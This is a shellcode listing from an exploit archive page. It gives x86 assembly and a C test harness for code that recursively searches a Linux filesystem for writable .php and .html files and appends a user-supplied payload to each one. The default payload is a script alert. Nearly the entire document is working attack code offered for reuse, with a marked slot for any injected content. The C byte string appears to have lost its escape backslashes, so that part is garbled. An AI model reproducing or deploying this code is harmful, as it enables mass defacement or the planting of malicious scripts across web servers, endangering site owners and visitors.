[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Linux/x86 Search For php,html Writable Files and Add Your Code
# Published : 2012-01-17
# Author :
# Previous Title : Shellcode Checksum Routine
# Next Title : Linux x86_64 - add user with passwd (189 bytes)


; Title : Linux/x86 Search php,html writable files and add your code.
; Date  : 2011-10-24 
; Author: rigan - imrigan [sobachka ] gmail.com
; Size  : 380 bytes + your code.
;
; Note  : This shellcode writes down your code in the end of 
;         found files. Your code will be added only .html and .php 
;         files. Search for files is carried out recursively.  

 

BITS 32

section .text
global _start
_start:
;======================================================================;
;                               main                                   ;
;======================================================================;
              ; chdir("/")  
                xor eax, eax
                push eax
                sub esp, BYTE 0x1
                mov BYTE [esp], 0x2f
                mov ebx, esp
                mov al, 12
                int 0x80
            
                xor eax, eax
                push eax
                sub esp, BYTE 0x1
                mov BYTE [esp], 0x2e
               
                jmp SHORT .exit

.jmp_search: 
                jmp SHORT search      

.exit:
                call .jmp_search
         
              ; exit(0)   
                xor eax, eax
                xor ebx, ebx
                mov al, 1
                int 0x80

;======================================================================;
;                               inject                                 ;
;======================================================================;
inject:
               ; open("file", O_WRONLY)
                xor eax, eax
                mov ebx, edi
                xor ecx, ecx
                mov cl, 2
                mov al, 5
                int 0x80
                                               
              ; lseek(fd, 0, SEEK_END)
                xor ebx, ebx
                mov ebx, eax
                xor ecx, ecx
                xor eax, eax
                cdq
                mov dl, 2
                mov al, 19
                int 0x80
    
              ; write(fd, your_code, sizeof(your_code))  
                xor eax, eax
                mov ecx, esi
                mov dl, 43   ; <- TO CHANGE THE SIZE HERE.
                mov al, 4
                int 0x80 

              ; close(fd)
                xor eax, eax
                xor ebx, ebx
                mov al, 6
                int 0x80 
              
                ret
                
;======================================================================;
;                               substr                                 ;
;======================================================================;
        
substr:       
                xor eax, eax
                xor ebx, ebx
                xor ecx, ecx
                cdq

loop_1: 
                inc edx
                
              ; edi contains the filename address
              ; esi contains the substring address 
                mov BYTE bl, [edi + edx] 
        
                test bl, bl 
                jz not_found
                
                cmp BYTE bl, [esi]        
                jne loop_1        

loop_2:        
                mov BYTE al, [esi + ecx]
                mov BYTE bl, [edi + edx]
        
                test al, al
                jz found
        
                inc ecx
        
                inc edx
                cmp bl, al
       
                je loop_2
        
                jmp short not_found

found:
                xor eax, eax
                mov al, 2
        
not_found:
               
                ret
                
;======================================================================;
;                               search                                 ;
;======================================================================;
;This function recursively find all writable files. [php, html]
search:
                push ebp
                mov ebp, esp
                
                
                mov al, 250
                sub esp, eax
               
              ; open(".", O_WRONLY)
                xor eax, eax
                xor ecx, ecx
                lea ebx, [ebp + 8]
                mov al, 5
                int 0x80
         
                test eax, eax
                js .old_dirent
      
                mov [ebp + 12], eax    

.while:
              ; readdir(fd, struct old_linux_dirent *dirp, NULL)
                mov esi, [ebp + 12]
                mov ebx, esi
                xor eax, eax
                xor ecx, ecx
                lea ecx, [esp + 100]
                mov al, 89
                int 0x80
         
                test eax, eax
                jnz .l1

              ; closedir(fd)
                xor eax, eax
                xor ebx, ebx
                mov ebx, esi
                mov al, 6
                int 0x80

.old_dirent:         
              ; chdir("..")
                xor eax, eax
                push eax
                push WORD 0x2e2e
                mov ebx, esp
                mov al, 12
                int 0x80

                leave 
                ret

.l1:
                lea edx, [esp + 110]
                
                cmp DWORD [edx], 0x636f7270   ; If the /proc filesystem detected...
                je .while                     ; ...next dir
         
                cmp BYTE [edx], 0x2e
                jne .l2
                
                jmp  .while

.l2:
              ; lstat(const char *file, struct stat *buf)
                mov ebx, edx
                mov ecx, esp
                xor eax, eax
                mov al, 196
                int 0x80 
         
                mov cx, 61439
                mov bx, 40959
                inc ecx   
                inc ebx
                mov eax, [esp + 16]
         
                and ax, cx
         
                cmp ax, bx
                jne .l3
                
                jmp .while

.l3:
                xor eax, eax
                push eax
                sub esp, BYTE 0x1
                mov BYTE [esp], 0x2e
         
              ; chdir("file")
                mov ebx, edx
                mov al, 12
                int 0x80
         
                test eax, eax
                jne .l4
         
                call search
                
                jmp .while

.l4:   
              ; access("file", W_OK)       
                xor eax, eax
                mov ebx, edx
                xor ecx, ecx
                mov cl, 2
                mov al, 33
                int 0x80
         
       
                test eax, eax
                jz .check_html
                
                jmp .while

;======================================================================;
;                               check_html                             ;
;======================================================================;
.check_html:
                xor eax, eax
                push eax
                push DWORD 0x6c6d7468   ; 
                sub esp, BYTE 0x1       ; .html
                mov BYTE [esp], 0x2e    ;  
                
                mov esi, esp         
                mov edi, edx         
                call substr
         
                cmp BYTE al, 2
                je .do_inject

;======================================================================;
;                               check_php                              ;
;======================================================================;               
.check_php:     
                xor eax, eax
                push eax
                push DWORD 0x7068702e   ; .php
               
                mov esi, esp         
                
                call substr
                
                cmp BYTE al, 2
                je .do_inject
                
                jmp .while 

;======================================================================;
;                               do_inject                              ;
;======================================================================;
.do_inject: 
                jmp SHORT .your_code
                
.write:  
                pop  esi    ; Get the address of your code into esi
                
                call inject
                
                jmp .while

;======================================================================;  
;                               your_code                              ;
;======================================================================;
 .your_code:
               call .write
                                                                                              
; Here a place for your code. Its size should be allocated in the
; register dl. Look at the "inject" function.                                                               
                                                                                               
db '<html><script>alert("pwn3d")<script></html>' ;<- You can change it.

; Dont't forget to change the size of your code!
------------------------------------------------------------------------ 
                         
             
              Below is presented the shellcode equivalent.
                              

#include <stdio.h>

char shellcode[] = 
                            
    "x31xc0x50x83xecx01xc6x04x24x2fx89xe3xb0x0cxcdx80"
    "x31xc0x50x83xecx01xc6x04x24x2exebx02xebx63xe8xf9"
    "xffxffxffx31xc0x31xdbxb0x01xcdx80x31xc0x89xfbx31"
    "xc9xb1x02xb0x05xcdx80x31xdbx89xc3x31xc9x31xc0x99"
    "xb2x02xb0x13xcdx80x31xc0x89xf1xb2x2bxb0x04xcdx80" 
    "x31xc0xb0x06xcdx80xc3x31xc0x31xdbx31xc9x99x42x8a"
    "x1cx17x84xdbx74x1ax3ax1ex75xf4x8ax04x0ex8ax1cx17"
    "x84xc0x74x08x41x42x38xc3x74xf0xebx04x31xc0xb0x02"
    "xc3x55x89xe5xb0xfax29xc4x31xc0x31xc9x8dx5dx08xb0"
    "x05xcdx80x85xc0x78x22x89x45x0cx8bx75x0cx89xf3x31"
    "xc0x31xc9x8dx4cx24x64xb0x59xcdx80x85xc0x75x19x31"
    "xc0x31xdbx89xf3xb0x06xcdx80x31xc0x50x66x68x2ex2e"
    "x89xe3xb0x0cxcdx80xc9xc3x8dx54x24x6ex81x3ax70x72"
    "x6fx63x74xc6x80x3ax2ex75x05xe9xbcxffxffxffx89xd3"
    "x89xe1x31xc0xb0xc4xcdx80x66xb9xffxefx66xbbxffx9f"
    "x41x43x8bx44x24x10x66x21xc8x66x39xd8x75x05xe9x97"
    "xffxffxffx31xc0x50x83xecx01xc6x04x24x2ex89xd3xb0"
    "x0cxcdx80x85xc0x75x0axe8x65xffxffxffxe9x79xffxff" 
    "xffx31xc0x89xd3x31xc9xb1x02xb0x21xcdx80x85xc0x74"
    "x05xe9x64xffxffxffx31xc0x50x68x68x74x6dx6cx83xec"
    "x01xc6x04x24x2ex89xe6x89xd7xe8x09xffxffxffx3cx02"
    "x74x18x31xc0x50x68x2ex70x68x70x89xe6xe8xf6xfexff"
    "xffx3cx02x74x05xe9x30xffxffxffxebx0bx5exe8xb9xfe"
    "xffxffxe9x23xffxffxffxe8xf0xffxffxff"
    // <html><script>alert("pwn3d")<script></html>
    "x3cx68x74x6dx6cx3ex3cx73x63x72x69x70x74x3ex61x6c"
    "x65x72x74x28x22x70x77x6ex33x64x22x29x3cx73x63x72"
    "x69x70x74x3ex3cx2fx68x74x6dx6cx3e";
    
int main()
{   
  printf("%dn", strlen(shellcode));
  (*(void (*)()) shellcode)();
  return 0;
}